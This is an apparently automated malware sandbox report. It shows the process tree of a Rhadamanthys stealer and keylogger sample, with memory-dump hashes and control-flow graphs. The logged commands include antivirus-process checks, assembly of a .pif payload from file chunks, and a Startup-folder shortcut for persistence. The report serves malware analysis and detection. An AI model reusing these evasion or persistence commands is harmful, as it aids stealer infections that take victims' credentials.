                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:23:46:13
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:17
                                                                                                                                                            Start time:23:46:14
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:tasklist
                                                                                                                                                            Imagebase:0xb0000
                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:18
                                                                                                                                                            Start time:23:46:14
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                            Imagebase:0xa20000
                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:19
                                                                                                                                                            Start time:23:46:15
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:tasklist
                                                                                                                                                            Imagebase:0xb0000
                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:21
                                                                                                                                                            Start time:23:46:15
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                            Imagebase:0xa20000
                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:22
                                                                                                                                                            Start time:23:46:16
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:cmd /c md 29026
                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:23
                                                                                                                                                            Start time:23:46:16
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 29026\Identification.pif
                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:24
                                                                                                                                                            Start time:23:46:17
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:cmd /c copy /b Conf 29026\m
                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:25
                                                                                                                                                            Start time:23:46:17
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:29026\Identification.pif 29026\m
                                                                                                                                                            Imagebase:0x230000
                                                                                                                                                            File size:946'784 bytes
                                                                                                                                                            MD5 hash:848164D084384C49937F99D5B894253E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000003.2987224346.0000000001500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 5%, ReversingLabs
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:26
                                                                                                                                                            Start time:23:46:17
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:ping -n 5 localhost
                                                                                                                                                            Imagebase:0xa20000
                                                                                                                                                            File size:18'944 bytes
                                                                                                                                                            MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:28
                                                                                                                                                            Start time:23:46:44
                                                                                                                                                            Start date:20/02/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:false

                                                                                                                                                            Reset < >
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000003.2024418006.00000278B7660000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000278B7660000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_3_278b7660000_mshta.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                              • Instruction ID: 41895a1b65220182f13423409c5f128343551aae90bb0e735a7acb2f15ba3748
                                                                                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                              • Instruction Fuzzy Hash: 7B9002048D950755D41411910C8D69C5040638D154FD85491881BD0184D89D42961152
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000003.2024418006.00000278B7660000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000278B7660000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_3_278b7660000_mshta.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                              • Instruction ID: 41895a1b65220182f13423409c5f128343551aae90bb0e735a7acb2f15ba3748
                                                                                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                              • Instruction Fuzzy Hash: 7B9002048D950755D41411910C8D69C5040638D154FD85491881BD0184D89D42961152
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000003.2024418006.00000278B7660000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000278B7660000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_3_278b7660000_mshta.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                              • Instruction ID: 41895a1b65220182f13423409c5f128343551aae90bb0e735a7acb2f15ba3748
                                                                                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                              • Instruction Fuzzy Hash: 7B9002048D950755D41411910C8D69C5040638D154FD85491881BD0184D89D42961152
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2366798853.00007FF8487C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487C0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ff8487c0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: K
                                                                                                                                                              • API String ID: 0-856455061
                                                                                                                                                              • Opcode ID: ce3ba068a4eacfd33f3a23eb4c9a7b29a949d69750c1b8f02f74ca34bc29c6da
                                                                                                                                                              • Instruction ID: f6d1c3b33140b3cd40982a0b446cd4654d9509b80fb7a389d3deb598ee739a86
                                                                                                                                                              • Opcode Fuzzy Hash: ce3ba068a4eacfd33f3a23eb4c9a7b29a949d69750c1b8f02f74ca34bc29c6da
                                                                                                                                                              • Instruction Fuzzy Hash: D7E1B031A4CA498FEF94EF5CD4A5AED7BE1FF68354F14016AD009D7296CB24E841CB88
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2366798853.00007FF8487C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487C0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ff8487c0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                              • Instruction ID: 279e4b3fd6b3a67c873c82ab6ea400ce9a944735069eb7cbe03bf496c67dbd64
                                                                                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                              • Instruction Fuzzy Hash: CD01A73010CB0C8FD744EF0CE451AA9B3E0FB85360F10052DE58AC3651D732E882CB45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:3
                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                              execution_graph 15922 7ff8487ac809 15923 7ff8487ac80f CreateFileW 15922->15923 15925 7ff8487ac8de 15923->15925

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 7ff8487a5f50 1 7ff8487ab533-7ff8487ab539 0->1 2 7ff8487ab570-7ff8487ab599 0->2 2->1 5 7ff8487ab59b-7ff8487ab5c0 2->5 7 7ff8487ab5c2-7ff8487ab5c7 call 7ff8487a5fb0 5->7 8 7ff8487ab5cc-7ff8487ab603 5->8 7->8 11 7ff8487ab7f4-7ff8487ab809 8->11 12 7ff8487ab609-7ff8487ab614 8->12 19 7ff8487ab813-7ff8487ab85e 11->19 20 7ff8487ab80b-7ff8487ab812 11->20 13 7ff8487ab682-7ff8487ab687 12->13 14 7ff8487ab616-7ff8487ab61e 12->14 17 7ff8487ab6f3-7ff8487ab6fd 13->17 18 7ff8487ab689-7ff8487ab695 13->18 14->11 16 7ff8487ab624-7ff8487ab639 14->16 23 7ff8487ab662-7ff8487ab66d 16->23 24 7ff8487ab63b-7ff8487ab660 16->24 21 7ff8487ab71f-7ff8487ab727 17->21 22 7ff8487ab6ff-7ff8487ab71d call 7ff8487a5fd0 17->22 18->11 25 7ff8487ab69b-7ff8487ab6ae 18->25 46 7ff8487ab860-7ff8487ab866 19->46 47 7ff8487ab87b-7ff8487ab88c 19->47 20->19 26 7ff8487ab72a-7ff8487ab735 21->26 22->21 23->11 29 7ff8487ab673-7ff8487ab680 23->29 24->23 31 7ff8487ab6b0-7ff8487ab6b3 24->31 25->26 26->11 32 7ff8487ab73b-7ff8487ab756 26->32 29->13 29->14 34 7ff8487ab6b5 31->34 35 7ff8487ab6bf-7ff8487ab6c7 31->35 32->11 33 7ff8487ab75c-7ff8487ab76f 32->33 33->11 38 7ff8487ab775-7ff8487ab786 33->38 34->35 35->11 39 7ff8487ab6cd-7ff8487ab6f2 35->39 38->11 45 7ff8487ab788-7ff8487ab797 38->45 48 7ff8487ab7e2-7ff8487ab7f3 45->48 49 7ff8487ab799-7ff8487ab7a4 45->49 50 7ff8487ab8c1-7ff8487ab93a 46->50 51 7ff8487ab868-7ff8487ab879 46->51 52 7ff8487ab88e-7ff8487ab899 47->52 53 7ff8487ab89d-7ff8487ab8c0 47->53 49->48 58 7ff8487ab7a6-7ff8487ab7dd call 7ff8487a5fd0 49->58 66 7ff8487ab94e-7ff8487ab95f 50->66 67 7ff8487ab93c-7ff8487ab94c 50->67 51->46 51->47 58->48 69 7ff8487ab970-7ff8487ab9a1 66->69 70 7ff8487ab961-7ff8487ab96c 66->70 67->66 67->67 75 7ff8487ab9a3-7ff8487ab9a9 69->75 76 7ff8487ab9f7-7ff8487ab9fe 69->76 70->69 75->76 77 7ff8487ab9ab-7ff8487ab9ac 75->77 78 7ff8487aba00-7ff8487aba01 76->78 79 7ff8487aba3f-7ff8487aba68 76->79 80 7ff8487ab9af-7ff8487ab9b2 77->80 81 7ff8487aba04-7ff8487aba07 78->81 82 7ff8487aba69-7ff8487abb32 80->82 85 7ff8487ab9b8-7ff8487ab9c8 80->85 81->82 83 7ff8487aba09-7ff8487aba1a 81->83 100 7ff8487abb34-7ff8487abb39 82->100 101 7ff8487abb3b-7ff8487abb3f 82->101 86 7ff8487aba36-7ff8487aba3d 83->86 87 7ff8487aba1c-7ff8487aba22 83->87 88 7ff8487ab9f0-7ff8487ab9f5 85->88 89 7ff8487ab9ca-7ff8487ab9ec 85->89 86->79 86->81 87->82 90 7ff8487aba24-7ff8487aba32 87->90 88->76 88->80 89->88 90->86 102 7ff8487abb42-7ff8487abc2c call 7ff8487a4620 100->102 101->102 115 7ff8487abc35-7ff8487abc39 102->115 116 7ff8487abc2e-7ff8487abc33 102->116 117 7ff8487abc3c-7ff8487abc87 115->117 116->117 121 7ff8487abc90-7ff8487abc94 117->121 122 7ff8487abc89-7ff8487abc8e 117->122 123 7ff8487abc97-7ff8487abd93 121->123 122->123 135 7ff8487abd9a-7ff8487abdb6 123->135 137 7ff8487abdb8-7ff8487abdba 135->137 138 7ff8487abdbc-7ff8487abdd5 135->138 139 7ff8487abdd7-7ff8487abde5 137->139 138->139 141 7ff8487abe72-7ff8487abe9e 139->141 142 7ff8487abdeb-7ff8487abe5c call 7ff8487a6db8 139->142 143 7ff8487abea4-7ff8487abf51 call 7ff8487a6d68 141->143 144 7ff8487abf58-7ff8487abf98 141->144 173 7ff8487abe71 142->173 174 7ff8487abe5e-7ff8487abe6b 142->174 143->144 154 7ff8487ac089-7ff8487ac097 call 7ff8487ac12e 144->154 155 7ff8487abf9e-7ff8487abfac 144->155 165 7ff8487ac0aa-7ff8487ac0b5 154->165 166 7ff8487ac099-7ff8487ac0a7 154->166 157 7ff8487abfb2-7ff8487abfbd 155->157 158 7ff8487ac041-7ff8487ac088 155->158 158->154 175 7ff8487ac0b7-7ff8487ac0fb call 7ff8487a2ed8 165->175 176 7ff8487ac11b-7ff8487ac12d 165->176 166->165 173->141 174->141
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 8=zH$d$hM_H
                                                                                                                                                              • API String ID: 0-2767458927
                                                                                                                                                              • Opcode ID: d74ecea4b3e73efacf8a540612523b65a8dfced0e13ff3915f93aec190527d7c
                                                                                                                                                              • Instruction ID: dc5ba89d19dc1a6b39bf01c80a29c00a5bc5f80b5c70d834c1be137376725e70
                                                                                                                                                              • Opcode Fuzzy Hash: d74ecea4b3e73efacf8a540612523b65a8dfced0e13ff3915f93aec190527d7c
                                                                                                                                                              • Instruction Fuzzy Hash: 2C823731A1CB4A8FE758EF2894656B973E1FF95340F1442BEC04EC7296DF29E8428784
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: oM_^$pM_^$qM_^
                                                                                                                                                              • API String ID: 0-1552984782
                                                                                                                                                              • Opcode ID: 362e6285512fe2f71684d3e096ce463f975c5f21839683fa86d9ec5fd08bd6bf
                                                                                                                                                              • Instruction ID: 82eb4d3dee2bbb9a4f6b33e670a7d7d2712433c593abb6901f0c3bce7f9a5eff
                                                                                                                                                              • Opcode Fuzzy Hash: 362e6285512fe2f71684d3e096ce463f975c5f21839683fa86d9ec5fd08bd6bf
                                                                                                                                                              • Instruction Fuzzy Hash: C1B11A1BB0D66A5AE3017E7DB8550FD7B50DFC13B6B0C43B7D288C9083ED19644A82E8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: gK_H
                                                                                                                                                              • API String ID: 0-3193895614
                                                                                                                                                              • Opcode ID: aa57f307a8ba288838ccf66c21efdc7b368f4734f2826ad8d56c131215423e79
                                                                                                                                                              • Instruction ID: 8f0dec3560a914485307dcc05b64a644fe10871c4f4e8fc3d74c43594c184bea
                                                                                                                                                              • Opcode Fuzzy Hash: aa57f307a8ba288838ccf66c21efdc7b368f4734f2826ad8d56c131215423e79
                                                                                                                                                              • Instruction Fuzzy Hash: DD127030A1CB468FE7B8EF1894557BA77D1EB98750F10467ED48EC3291DF34A8428786
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: hM_H
                                                                                                                                                              • API String ID: 0-3803223642
                                                                                                                                                              • Opcode ID: 0266699ad70dd1e3173395f8cb26e7c43fe48a40866dda98ecf45e5755dcd54f
                                                                                                                                                              • Instruction ID: 04839db7e0698e7bc3a3afe7689dc87676363c55842b2e9a9b767ae30c399774
                                                                                                                                                              • Opcode Fuzzy Hash: 0266699ad70dd1e3173395f8cb26e7c43fe48a40866dda98ecf45e5755dcd54f
                                                                                                                                                              • Instruction Fuzzy Hash: 39F1F431B1CA4A8FEB98EF3884696B973D2FF95344F1445BED00EC7296CE29D8428744
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 539 7ff84887de61-7ff84887de6d 540 7ff84887de6f 539->540 541 7ff84887de71-7ff84887deaf 539->541 540->541 542 7ff84887deb1-7ff84887df07 540->542 541->542 546 7ff84887df0d-7ff84887df17 542->546 547 7ff84887e1d7-7ff84887e20d 542->547 548 7ff84887df19-7ff84887df31 546->548 549 7ff84887df33-7ff84887df40 546->549 558 7ff84887e20f-7ff84887e233 547->558 559 7ff84887e238-7ff84887e278 547->559 548->549 556 7ff84887df46-7ff84887df49 549->556 557 7ff84887e173-7ff84887e17d 549->557 556->557 560 7ff84887df4f-7ff84887df5b 556->560 561 7ff84887e17f-7ff84887e18b 557->561 562 7ff84887e18c-7ff84887e1d4 557->562 558->559 560->547 564 7ff84887df61-7ff84887df6b 560->564 562->547 567 7ff84887df6d-7ff84887df7a 564->567 568 7ff84887df84-7ff84887df89 564->568 567->568 574 7ff84887df7c-7ff84887df82 567->574 568->557 573 7ff84887df8f-7ff84887df94 568->573 575 7ff84887dfaf 573->575 576 7ff84887df96-7ff84887dfad 573->576 574->568 577 7ff84887dfb1-7ff84887dfb3 575->577 576->577 577->557 580 7ff84887dfb9-7ff84887dfbc 577->580 582 7ff84887dfbe-7ff84887dfe1 580->582 583 7ff84887dfe3 580->583 584 7ff84887dfe5-7ff84887dfe7 582->584 583->584 584->557 586 7ff84887dfed-7ff84887e032 584->586 586->557 593 7ff84887e038-7ff84887e048 586->593 594 7ff84887e04a-7ff84887e054 593->594 595 7ff84887e058 593->595 596 7ff84887e056 594->596 597 7ff84887e074-7ff84887e092 594->597 598 7ff84887e05d-7ff84887e06a 595->598 596->598 597->595 601 7ff84887e094-7ff84887e09e 597->601 598->597 602 7ff84887e06c-7ff84887e072 598->602 603 7ff84887e0b7-7ff84887e125 601->603 604 7ff84887e0a0-7ff84887e0b5 601->604 602->597 612 7ff84887e127-7ff84887e143 603->612 613 7ff84887e145-7ff84887e146 603->613 604->603 612->613 615 7ff84887e14e-7ff84887e15a 613->615 617 7ff84887e15c-7ff84887e160 615->617 618 7ff84887e162-7ff84887e167 615->618 619 7ff84887e168-7ff84887e172 617->619 618->619
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2248180292.00007FF848870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848870000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff848870000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DK_L
                                                                                                                                                              • API String ID: 0-196361847
                                                                                                                                                              • Opcode ID: d7dbd6b46f0f5635a6c3e120caa2ca7866ffa2cde26c0953eb1b5d73effb5c86
                                                                                                                                                              • Instruction ID: afa6d35bf289a70b8fd5bef355f6a81574e0fecadad11e5fdc5f6e6657d7ba6c
                                                                                                                                                              • Opcode Fuzzy Hash: d7dbd6b46f0f5635a6c3e120caa2ca7866ffa2cde26c0953eb1b5d73effb5c86
                                                                                                                                                              • Instruction Fuzzy Hash: 18E12331E0DA8A8FEB95EB2898556B8BBF1FF55750F0801BBD00DC7192DB28AC05C755
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dfb8e56e0f783cab98d7c1bb8b144383429f472b5de36783151f5a6fcb8ddf28
                                                                                                                                                              • Instruction ID: b3d28feb974291bf47bb9704248d0edccd7ffdadbf4890fb9dd38c8006f6b4dc
                                                                                                                                                              • Opcode Fuzzy Hash: dfb8e56e0f783cab98d7c1bb8b144383429f472b5de36783151f5a6fcb8ddf28
                                                                                                                                                              • Instruction Fuzzy Hash: 6861E43190CB485FE758EF6898596B97BE0FF99351F08427ED049D3292DF28A8028785
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 649 7ff8487ac809-7ff8487ac873 654 7ff8487ac875-7ff8487ac87a 649->654 655 7ff8487ac87d-7ff8487ac8dc CreateFileW 649->655 654->655 656 7ff8487ac8e4-7ff8487ac90c 655->656 657 7ff8487ac8de 655->657 657->656
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000008.00000002.2246434097.00007FF8487A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8487A0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ff8487a0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 4806e0fc3c5ad837d21fe454c827f8b67a4dda19c42a691589d1a0b68672d522
                                                                                                                                                              • Instruction ID: 42babb11086cdc37bd4e7047e5b89410ef8091c3023c2ddafd4ea64428efd50c
                                                                                                                                                              • Opcode Fuzzy Hash: 4806e0fc3c5ad837d21fe454c827f8b67a4dda19c42a691589d1a0b68672d522
                                                                                                                                                              • Instruction Fuzzy Hash: 0031A23191CA5C9FDB58EF5CD846AE97BE0FBA9721F04422FE049E3251CB75A8018B85
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
